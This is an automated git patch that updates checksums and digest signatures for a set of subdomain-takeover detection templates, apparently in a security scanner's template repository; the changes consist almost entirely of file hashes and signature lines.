-http/takeovers/uberflip-takeover.yaml:154d577b095dc78ddeb169bfbc15747a106e4abf -http/takeovers/uptime-takeover.yaml:f9981402d663ec41860331ffca501a55d5a2dce0 -http/takeovers/uptimerobot-takeover.yaml:491f4c81a2351d275943abe78437d45010346ef2 -http/takeovers/uservoice-takeover.yaml:cfd1730b418655f4ef16ce1fd29ac406af3ac472 -http/takeovers/vend-takeover.yaml:61af84b5ce0e9de0f9657e64c793e8c1f22110c6 -http/takeovers/wishpond-takeover.yaml:59ed0bc6dabc39d9915c45bea80c75ad96ee00c3 -http/takeovers/wix-takeover.yaml:d3f8931c10d51d15a048f8ccd9c603b5f5164b5d -http/takeovers/wordpress-takeover.yaml:6943a0158783833fd1797e7500e985be38acaefd -http/takeovers/worksites-takeover.yaml:2293113a74da8408145f40466b6643cbc35bee91 -http/takeovers/wufoo-takeover.yaml:aa7373517bcaebe9e5e7ec202f07dd7ed9b02efe -http/takeovers/zendesk-takeover.yaml:a47ca9f517bc4450ee17132060e6c7e97ee07a07 +http/takeovers/aftership-takeover.yaml:18bbb4a8a19ade38889a80e4e85dedd1cffb7981 +http/takeovers/agilecrm-takeover.yaml:7b696d0253f2956a33e2805ec62de7862502e1c2 +http/takeovers/aha-takeover.yaml:847bc94aa153a32ead20ae21536deab150d99394 +http/takeovers/airee-takeover.yaml:25ea0e4beb9757ca5f56e52eca47b2047866c223 +http/takeovers/anima-takeover.yaml:aee6e870c420836495f4b81d09179b2da2178f96 +http/takeovers/announcekit-takeover.yaml:439e5820f57ed46947475040e95096a7480e945a +http/takeovers/aws-bucket-takeover.yaml:0f82823a5b2616fc607deee37e30329be92cf9fc +http/takeovers/bigcartel-takeover.yaml:a8e849eadef6b8b091ea8d91ea3c85c24c0032eb +http/takeovers/bitbucket-takeover.yaml:34523edb4c5da6a38883840057a6fbb9409a8f1e +http/takeovers/campaignmonitor-takeover.yaml:b9f3ac20ad2ea96295badf483515c1fbc0d40737 +http/takeovers/canny-takeover.yaml:bf96d603d133f870e3707a262204fa27de2c8648 +http/takeovers/cargo-takeover.yaml:8ca9c47c8b4b2615a331f12f9ebd43c3d4d7d822 +http/takeovers/cargocollective-takeover.yaml:2705684459aaa559c3bb885e68248c987d81123e +http/takeovers/clever-takeover.yaml:39d09eba6d91b59ebe8c1f81690a85d78afd51db +http/takeovers/flexbe-takeover.yaml:a11eda9805b642fc724d37237663dbf7e94aeace +http/takeovers/frontify-takeover.yaml:17b4f0104104def81180a9735f49d3c33713e17f +http/takeovers/gemfury-takeover.yaml:0c9298233ad211aa0d0af13998e53a7ae122ec53 +http/takeovers/getresponse-takeover.yaml:638c9eafb8ae736cfa4298a70dee6beb69b6606b +http/takeovers/ghost-takeover.yaml:d499de473c0e8896939071a959c618bd2026ad1b +http/takeovers/gitbook-takeover.yaml:8499605e997f66ccdb8e81d0ea0f42da04ef3bd3 +http/takeovers/github-takeover.yaml:b23119f8c75503f7c05262e32f0daea6eb644614 +http/takeovers/gohire-takeover.yaml:089a859b3a8a8fdc76af29163a26075ded11c277 +http/takeovers/hatenablog-takeover.yaml:2448390b211a7b0bf38ca7fd665af9084ec623b1 +http/takeovers/helpdocs-takeover.yaml:420da02fa5d9f152087462b2685f40d04cba4369 +http/takeovers/helpjuice-takeover.yaml:32ec75d23c8baa78f37769c878f426a795d90ab1 +http/takeovers/helprace-takeover.yaml:5f688537349cf503850bd296139a163f84a51d95 +http/takeovers/helpscout-takeover.yaml:8ce400e5d2935714c6b139a57e73db3812f81694 +http/takeovers/hubspot-takeover.yaml:b23fc0acb77e56c54018c58c6add2521d208a74e +http/takeovers/intercom-takeover.yaml:78d6b832330ef949607e3aedb5078a2363f3d4ba +http/takeovers/jazzhr-takeover.yaml:63d6036b4f3f7d711cf618f732c456ec8c2d6b89 +http/takeovers/jetbrains-takeover.yaml:8509e9c0c25f84bd48a7979c348c743bf41824b4 +http/takeovers/kinsta-takeover.yaml:0fdbc22ed592a124c0b71095b9c89093646c8010 +http/takeovers/launchrock-takeover.yaml:81c11c1a1ff1f9791187d25f633bbccf025c7631 +http/takeovers/leadpages-takeover.yaml:8fc7c46511356656bd93ffe249907002ae3cd4fc +http/takeovers/lemlist-takeover.yaml:2e42cd27d93248cc465b7aa0f9a30f5bb50c7f32 +http/takeovers/mashery-takeover.yaml:51a3811214f2ba2cf45c93e120004c8d6a10e646 +http/takeovers/meteor-takeover.yaml:5c3a00de754e807d5241280d187956b8f73b7c1e +http/takeovers/netlify-takeover.yaml:bc2a1b46ffa243be876266839314bd715de54ed4 +http/takeovers/ngrok-takeover.yaml:c85f6d434f8be5716b54101629b1749a1110e9ef +http/takeovers/pagewiz-takeover.yaml:9f5eca0e7b3ae8569c89af23db961ddef4ed3fa0 +http/takeovers/pantheon-takeover.yaml:d8cc7dcef539833539bdf994c9eb2329250cca42 +http/takeovers/pingdom-takeover.yaml:697078a14e7796a29b1ea0350891a886495a1c69 +http/takeovers/proposify-takeover.yaml:6978b8f0c654f281b0a116e0bec31c450d6801bc +http/takeovers/readme-takeover.yaml:f7bda555001bee1d376823864fd0859e05a32ea1 +http/takeovers/readthedocs-takeover.yaml:28e0c7d1b5264e08968f0954891c956644735a8d +http/takeovers/shopify-takeover.yaml:50edd9a6ee5826ca651f492e2bba132c1c52ae77 +http/takeovers/short-io.yaml:3f2433232632f3977d5d1c5b7f651973fd060b82 +http/takeovers/simplebooklet-takeover.yaml:0301493f16dce2d5eae687bbd1e92e2b0c715717 +http/takeovers/smartjob-takeover.yaml:8784887b13bcd959bf784caa5f435fbff6af3098 +http/takeovers/smugmug-takeover.yaml:5e690c5245f289daeae914e577682ef0f6866d32 +http/takeovers/softr-takeover.yaml:75cfadd52aa3d8f6a8f3328a4e9cad40c024165e +http/takeovers/sprintful-takeover.yaml:2ea600bcb47240966472dbc8242eee499680b8b3 +http/takeovers/squadcast-takeover.yaml:2e940a3f2ca46efee96d05272435a67c42aac2ed +http/takeovers/strikingly-takeover.yaml:f1614b7491273af8e941848f87c00915397f3320 +http/takeovers/surge-takeover.yaml:c92b580a30914c2f5432bf17044b530ce6f24473 +http/takeovers/surveygizmo-takeover.yaml:26b9f81c809a1858fe4034626fb67add4cb45e9a +http/takeovers/surveysparrow-takeover.yaml:0cdea1f83581902aba550bd1f7a4798e3e5fa7a8 +http/takeovers/tave-takeover.yaml:82e62c1d3e7dc89e41ff11fa903d80617b79f554 +http/takeovers/teamwork-takeover.yaml:144b132c53d05ab11e3a2614a59794b0d3fb6356 +http/takeovers/tilda-takeover.yaml:8c8e087e91fa9c3c03311720bb44910e27b22623 +http/takeovers/tumblr-takeover.yaml:1362cc1ddae926f9f80ec20f2f28b40e3459c00b +http/takeovers/uberflip-takeover.yaml:d77430c408c41acdfcf3b942a8492a0babaf299a +http/takeovers/uptime-takeover.yaml:ab5bc3086d43d8712d095dfd2de63c0b600f3c47 +http/takeovers/uptimerobot-takeover.yaml:9b7894f369ed3c9ea4acd5bdd97530683c54c100 +http/takeovers/uservoice-takeover.yaml:35d9de894391b44dfc90d8a46694058b43f6ff38 +http/takeovers/vend-takeover.yaml:04077899155778179cd21aec6d51688c32236a7c +http/takeovers/wishpond-takeover.yaml:67c35ee94b33bea3f287b86d0822459e8dcc54de +http/takeovers/wix-takeover.yaml:4deceb9a91edde4ac2b86edbd6d63817736137d2 +http/takeovers/wordpress-takeover.yaml:730fa5ffedcbd4902a04dc6e7799c620217391dc +http/takeovers/worksites-takeover.yaml:422aacc7cf30d8c8470bd5ca42f6fb5fc188284d +http/takeovers/wufoo-takeover.yaml:97c4d4f156c348f61eed297bbf7af16189627895 +http/takeovers/zendesk-takeover.yaml:b699e11af4cc9a51a9fcc99c38e13165f9a6c41a http/technologies/4D-detect.yaml:4b948a54eb2718980daa15d0ce2aaf5ee1bf843b http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 @@ -8863,7 +8863,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ff54a2d13cedc0bba397c40e2a10d4f86804b97a +templates-checksum.txt:c2109ec252ab8d7eebab4e947e9f7c9640545085 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 730958a43c7dece7bbaabf00967abcab34b093fc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 12:19:09 +0000 Subject: [PATCH 1078/1841] Auto Template Signing [Wed Jul 10 12:19:09 UTC 2024] :robot: --- http/takeovers/aftership-takeover.yaml | 3 +-- http/takeovers/agilecrm-takeover.yaml | 3 +-- http/takeovers/aha-takeover.yaml | 3 +-- http/takeovers/airee-takeover.yaml | 3 +-- http/takeovers/anima-takeover.yaml | 3 +-- http/takeovers/announcekit-takeover.yaml | 3 +-- http/takeovers/aws-bucket-takeover.yaml | 2 +- http/takeovers/bigcartel-takeover.yaml | 3 +-- http/takeovers/bitbucket-takeover.yaml | 3 +-- http/takeovers/campaignmonitor-takeover.yaml | 3 +-- http/takeovers/canny-takeover.yaml | 3 +-- http/takeovers/cargo-takeover.yaml | 3 +-- http/takeovers/cargocollective-takeover.yaml | 3 +-- http/takeovers/clever-takeover.yaml | 3 +-- http/takeovers/flexbe-takeover.yaml | 3 +-- http/takeovers/frontify-takeover.yaml | 3 +-- http/takeovers/gemfury-takeover.yaml | 3 +-- http/takeovers/getresponse-takeover.yaml | 3 +-- http/takeovers/ghost-takeover.yaml | 3 +-- http/takeovers/gitbook-takeover.yaml | 3 +-- http/takeovers/github-takeover.yaml | 3 +-- http/takeovers/gohire-takeover.yaml | 3 +-- http/takeovers/hatenablog-takeover.yaml | 3 +-- http/takeovers/helpdocs-takeover.yaml | 3 +-- http/takeovers/helpjuice-takeover.yaml | 3 +-- http/takeovers/helprace-takeover.yaml | 3 +-- http/takeovers/helpscout-takeover.yaml | 3 +-- http/takeovers/hubspot-takeover.yaml | 3 +-- http/takeovers/intercom-takeover.yaml | 3 +-- http/takeovers/jazzhr-takeover.yaml | 3 +-- http/takeovers/jetbrains-takeover.yaml | 3 +-- http/takeovers/kinsta-takeover.yaml | 3 +-- http/takeovers/launchrock-takeover.yaml | 3 +-- http/takeovers/leadpages-takeover.yaml | 3 +-- http/takeovers/lemlist-takeover.yaml | 4 +--- http/takeovers/mashery-takeover.yaml | 3 +-- http/takeovers/meteor-takeover.yaml | 3 +-- http/takeovers/netlify-takeover.yaml | 3 +-- http/takeovers/ngrok-takeover.yaml | 3 +-- http/takeovers/pagewiz-takeover.yaml | 3 +-- http/takeovers/pantheon-takeover.yaml | 3 +-- http/takeovers/pingdom-takeover.yaml | 3 +-- http/takeovers/proposify-takeover.yaml | 3 +-- http/takeovers/readme-takeover.yaml | 3 +-- http/takeovers/readthedocs-takeover.yaml | 3 +-- http/takeovers/shopify-takeover.yaml | 3 +-- http/takeovers/short-io.yaml | 3 +-- http/takeovers/simplebooklet-takeover.yaml | 3 +-- http/takeovers/smartjob-takeover.yaml | 3 +-- http/takeovers/smugmug-takeover.yaml | 3 +-- http/takeovers/softr-takeover.yaml | 3 +-- http/takeovers/sprintful-takeover.yaml | 3 +-- http/takeovers/squadcast-takeover.yaml | 3 +-- http/takeovers/strikingly-takeover.yaml | 3 +-- http/takeovers/surge-takeover.yaml | 3 +-- http/takeovers/surveygizmo-takeover.yaml | 3 +-- http/takeovers/surveysparrow-takeover.yaml | 3 +-- http/takeovers/tave-takeover.yaml | 3 +-- http/takeovers/teamwork-takeover.yaml | 3 +-- http/takeovers/tilda-takeover.yaml | 3 +-- http/takeovers/tumblr-takeover.yaml | 3 +-- http/takeovers/uberflip-takeover.yaml | 3 +-- http/takeovers/uptime-takeover.yaml | 3 +-- http/takeovers/uptimerobot-takeover.yaml | 3 +-- http/takeovers/uservoice-takeover.yaml | 3 +-- http/takeovers/vend-takeover.yaml | 3 +-- http/takeovers/wishpond-takeover.yaml | 3 +-- http/takeovers/wix-takeover.yaml | 3 +-- http/takeovers/wordpress-takeover.yaml | 3 +-- http/takeovers/worksites-takeover.yaml | 3 +-- http/takeovers/wufoo-takeover.yaml | 3 +-- http/takeovers/zendesk-takeover.yaml | 3 +-- 72 files changed, 72 insertions(+), 144 deletions(-) diff --git a/http/takeovers/aftership-takeover.yaml b/http/takeovers/aftership-takeover.yaml index 79e68bebf7..bee7fbfa3c 100644 --- a/http/takeovers/aftership-takeover.yaml +++ b/http/takeovers/aftership-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a004630440220222d1eb4e6f6121f15f5bc09566c05a04be84da680f71151b9a0217d13854d4b022066636a5d0f9d9541086bec1f1a65690fb36c5586c1735868842af4a0c58eaee5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203bd36036183a037bd252566dbbb5e7f0816219e8cea973674b3f087995c41183022100b4efe16a28cab2e2e12dfe9019bbf1fe083d72eb5c660a2ab0bdbd5dce65d877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/agilecrm-takeover.yaml b/http/takeovers/agilecrm-takeover.yaml index 0e4fabd754..18097debdd 100644 --- a/http/takeovers/agilecrm-takeover.yaml +++ b/http/takeovers/agilecrm-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100df8d7f10e37c0ea9ad8a43cad43285d174c0a517c03a1edd9acadc1c33996b3e022020a8458c4c9b14fcb69b1b580d4cd1df4b3978b8b02092699f8cced34099e500:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203e5437cdfd4734103ae21b5624d49a86012197e68f1ef22d4c61fd6506d2fd6b02210087c84457ec74570230a4ef789f50de0e6ad5bb3bdc311ddf92f804922863588c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/aha-takeover.yaml b/http/takeovers/aha-takeover.yaml index 81952a086e..50fab0b951 100644 --- a/http/takeovers/aha-takeover.yaml +++ b/http/takeovers/aha-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502202da63a10b501a98c072a6776384f2bb642c837e7641d4dd212870daca7f3d9c4022100cc8c4ca48ad64c1bf9fc3388866897a00f598074de0029df772a908fd56e7afa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210081e62f08cee1995440a0f533dac16d17a3d3e09858d21de29e4eb7768384812702204e28ac0c2110a91fb6eb08414f3cec591f0efff3b7e935cd6b23a82346138dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml index 2f0f3bfc3b..40d04ceb9c 100644 --- a/http/takeovers/airee-takeover.yaml +++ b/http/takeovers/airee-takeover.yaml @@ -31,5 +31,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 480a0045304302201fceaf9dc7e08c32388d3b25f15a78412295bf2d92087a506409f47b869448bd021f0b2d66db8da614dd8fafccc4e5bf7d5b7913386a434495fb55e2d1c0662a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb3b0d821630b1eb25fed8fae0a01c86dfdd0a5c047890f73228940bacad89b9022100b885654efd91153696697c0aa418b20838ae50cf6fe9fc2afd7a119b36f9c69e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml index e980c1055c..1f23a7a038 100644 --- a/http/takeovers/anima-takeover.yaml +++ b/http/takeovers/anima-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100dc61f6f23fb5b89280618c559a5a94234bd675ee6529ce314614fdaef00723c202205ca59abbb43ac8b43633f12437e8e3871234c8df3a8be291a2890e95ada73b68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052bc2aa8ee8306b3823bcb5602709089422854a4efc741cbe5fc42a38518a7270221009f05c449b7fddb5dadc6579dd533cf5c57db6b43308cedff609e52d8b97f112a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml index 7fa4470353..18696fa27f 100644 --- a/http/takeovers/announcekit-takeover.yaml +++ b/http/takeovers/announcekit-takeover.yaml @@ -35,5 +35,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450220411ce0a310d41e6a13fec4c4e48258ef47b6f97caa6f60fe2dbedf33aac7b52b022100db40ab50a70f049a2baf180b003297fbe4e98aef554cd1c625616f1a7ae9a82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100abf4b3ac11f8489ae50ed7777d1f7d75274fa69a6f4a9fdb621096c7276890d9022100ddc4b39e3a090dfd6f23f0454b07cd6fc159fc4b9671168dbd4d3f85b626dbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml index 5463e71682..7fa9918a36 100644 --- a/http/takeovers/aws-bucket-takeover.yaml +++ b/http/takeovers/aws-bucket-takeover.yaml @@ -79,4 +79,4 @@ http: regex: - '
  • BucketName: (.*?)
  • ' - '(.*?)' -# digest: 4a0a00473045022100a1bf43094a8a2ebf252d9ff331d334da4732cc4973121200c8d1a1faad8c0d0002201952b9324faa832fbed0e7662d820c1e56ea3f0820a3a67bc11da01926bba9b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a3d2908d2cb665d3af1b837197220ccae74b048608ec804640728c6044ba440022100e1bb94eba6194405a83a0d0ea50ce3aa58821b22e49db2e60e0d981eb64c4d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml index 84a9ff9ee2..3c7ec47c0e 100644 --- a/http/takeovers/bigcartel-takeover.yaml +++ b/http/takeovers/bigcartel-takeover.yaml @@ -34,5 +34,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100925b0be6cfcab185f932f0f073603f7240331485b0bc86ef326a6200d00be8f6022100fb1f27f39b22bb7b171bed7a45741877556f338a31086be1ad116d66d62f4670:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028493e5884364496cbe6db730031be69815e0db1681e8f82ceacc7cd72e7d35a022064ac6129e32c1bb9c265656259d8121e230e5339bced107b32285d2564920464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/bitbucket-takeover.yaml b/http/takeovers/bitbucket-takeover.yaml index 8b260b0608..d333f2d0a3 100644 --- a/http/takeovers/bitbucket-takeover.yaml +++ b/http/takeovers/bitbucket-takeover.yaml @@ -36,5 +36,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100c094e34cf6d07e1c771f27f42193b0798c3a060af2d82d2d9bdd68976a43314c0221008e9f7aa2de005c4d1aaa61c13c0f932d5fad0e3293793f601cfed2bb8b49dba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100800b04f4ce1fd3e4172c69ae962d1f36497dae9f92fb9adfa008f59e03b34c57022100eaf82edf3723c0158c2bd6f95e845b39cec747746577fb827de72bf03a2bbbfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml index 8fec07b82d..7697cef4cb 100644 --- a/http/takeovers/campaignmonitor-takeover.yaml +++ b/http/takeovers/campaignmonitor-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100819a18f9b86c9ddae6d1d8e7d0d7088f961b901bbf64ed52caa6d0d7d0700157022100d61fd5a1bc6a2d4b6df76ffeab57fb65851dd176ebd9eb7ec62559c646d99a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b819e2a332f9b5b7e20bb3d40809c79a572af68df43acc74cceec70c6ca2b263022100daabd6735cb9915204d98a7d66a3cf771c8485f50f54fa2d401f9726aaaf38ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/canny-takeover.yaml b/http/takeovers/canny-takeover.yaml index b534e3557f..0b0785760b 100644 --- a/http/takeovers/canny-takeover.yaml +++ b/http/takeovers/canny-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100e95e874db3fb64d398f7de9bf94384f2c59ae0fe2fb2d336f6f1e9ceb1b5198702204ffcbe8c8a191927de05681b857f561e8a2d5c662d505c009fc0e26db4bb65b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fdcb56474033a16495df92a420a76351d7817ea33497bf19673e71d271289ce2022100cfffee90b4b903e5be13da672bf2509c548c7b082d89337f5ad245230409697e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/cargo-takeover.yaml b/http/takeovers/cargo-takeover.yaml index 3b4f3b57f9..cf619882f3 100644 --- a/http/takeovers/cargo-takeover.yaml +++ b/http/takeovers/cargo-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100c56264fb56e062874dcaa3d5bf5d6d893f542f6cb6a0dc08812796bc8364ef7f022100fc1b0425d42fabb17822a50bf092be6557a2205913a9b38e9fd7b549cb4eee7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039c5b3256b28da9c9e9221e0023c40b4bf59550b34299d1025a9e3752546cdc20220697f0d05275826042cd6694b7964d3f91b47cacc86e1a7f346d33f2b67793608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/cargocollective-takeover.yaml b/http/takeovers/cargocollective-takeover.yaml index ba77525521..f466dd4f64 100644 --- a/http/takeovers/cargocollective-takeover.yaml +++ b/http/takeovers/cargocollective-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502206e3e3a36081a8592520a2de1a112710b7bc015cccef9821507fc0064e33d7b780221008d1ad7b1bbc8e7687d2c8efe1be0fb64bf95a3402f36ba08bb4a2576ab6d7fff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207891f1026ddf30a2dcef1e667b9e29c941a2b79f0392a0d0ef4cd6d5a7cdc974022100fd75665d6b068730f9b891b0535047a188904f9babb359f3e93a1490025d71f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/clever-takeover.yaml b/http/takeovers/clever-takeover.yaml index 7769dfb19f..7bacbdd456 100644 --- a/http/takeovers/clever-takeover.yaml +++ b/http/takeovers/clever-takeover.yaml @@ -33,5 +33,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502200a5e85c22f866e219ce404626a6c67addb67e89b5b92e10d9fd83b434e7336c3022100f862c3ca1bb2fb5467e28896d545cd1d2d17ef6fe6d9027fc95226caba6b5ca4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100997963360f12bfd0cfd2950139969b09b58f492fe8bb7d3e87105c8f39be376002203355a8edcf3dd6dd71a699ca4a01ad3499f7001b39e48c7cae5265064ab55a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml index dfebb6d357..14af1203cf 100644 --- a/http/takeovers/flexbe-takeover.yaml +++ b/http/takeovers/flexbe-takeover.yaml @@ -37,5 +37,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100f23c68360f3c8ffde41189aeb0c5571b3c4ad3e7c2e9b9c0afce192211737d2b022024647b913ab69f9aad45be5b47bc86466c29cce9c87a3f3d5315394e320d4d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022058ef15819ab6fb25b5f79436a3f8d581e504c0f6f92f9dc3c18fa2478bf3c3f80221009fa3274b5d611c04ce851a3c53d8af98e913475ec2a8c006bf80591531f6954a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/frontify-takeover.yaml b/http/takeovers/frontify-takeover.yaml index 3d2cb9bf77..1765c296ab 100644 --- a/http/takeovers/frontify-takeover.yaml +++ b/http/takeovers/frontify-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a00463044022021b423105a656ced8ce8e422c0bddf2ed4b3f550ca7d7c9ac82743af2195e3f3022034a251441fb9da75665b9a0dce13a77c96aa2459116904b043670e79022a7ebd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c8f88d2710cb52115876d7245b631b675280b8c02b46e23284711ac5377fbac022100f9412dfc45bba2e7b8f47426ee6405789a9eaa8e4270d9a430c52efcba1a9ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gemfury-takeover.yaml b/http/takeovers/gemfury-takeover.yaml index 8452f9c9c7..fcda77dd5d 100644 --- a/http/takeovers/gemfury-takeover.yaml +++ b/http/takeovers/gemfury-takeover.yaml @@ -34,5 +34,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100e7d6dba0eda3d3930f3dca078b7ad077afffc4dd087816a8d927f4c53d8c7687022100d893083aed1f67decbf6e1e59e4e1244fccc936e2f881303f15d0f4fdef4f437:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4a5a5c7f4cbdea4dfe6ba54f24e8d115c4b4ed97463e0b6f2f59089005693d402201739eab6a73212a6753bfc7014fef9f080667f4ecf1562df1d3ebdfe569a65b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/getresponse-takeover.yaml b/http/takeovers/getresponse-takeover.yaml index 754e5764a7..07d5ceb6ea 100644 --- a/http/takeovers/getresponse-takeover.yaml +++ b/http/takeovers/getresponse-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a004630440220050020aa27e758170d84b6e73692424006b84848ca5faae8e6bffadccc5c2000022016771fdf888e33a79802255d3530b581f338b6933415a56c05a3feb2a3ee777c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9544f43f7e76dae73b99c44544483505e22d05b811b3d3014ea7478651a13b50220183d82c1d47b04cd7433045c3b661617768399b5fde5465ae365d81b9ba8c1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ghost-takeover.yaml b/http/takeovers/ghost-takeover.yaml index 273c0bda41..a29c5b833f 100644 --- a/http/takeovers/ghost-takeover.yaml +++ b/http/takeovers/ghost-takeover.yaml @@ -35,5 +35,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100a5aa3c5ce4a8bc142b327031cd1fb21f5732356c4fb0ea207c8f9752f67f4c35022001ad7f03961d10bd1810747fc83882f4f22b7c6a6b080da3ecf474d6d9ceba2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef6e9387b76c6b0d10b0bb7578cabcb6318183cb7aa0a96921c7cccb3d23f19f02205779e8fdd4e525c1f6fdb6d24bdf06d512233517910e22958b12fa01ba90f2c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gitbook-takeover.yaml b/http/takeovers/gitbook-takeover.yaml index dfed33fceb..50f2236200 100644 --- a/http/takeovers/gitbook-takeover.yaml +++ b/http/takeovers/gitbook-takeover.yaml @@ -33,5 +33,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a00463044022052ee60fe1e2ef8770b8e8cbce78d52f642c4db18a81c84a23cf711895b5893fa02204de56d859be0fc6514cfcf19609067c70683e9938c8b9c3b56a034d2d1a3d609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007ba7ff01d235a698a165e83cd1ec53b8f0f2c1c9df81dc1d1c1c7263ab997ae02202a1d4d50779a1120aa7674e464dcf262df262770bd0b4f34c2508b625dc1b0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/github-takeover.yaml b/http/takeovers/github-takeover.yaml index 843319f89b..efbbe38619 100644 --- a/http/takeovers/github-takeover.yaml +++ b/http/takeovers/github-takeover.yaml @@ -39,5 +39,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100bb060bc8d7e38ff45b518bb436e03abc7179df307c79f75d9adbac9db571fc280220235be437c7bb36a211f7394383c66307e07cb0360b717690d37dab1b2e547e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 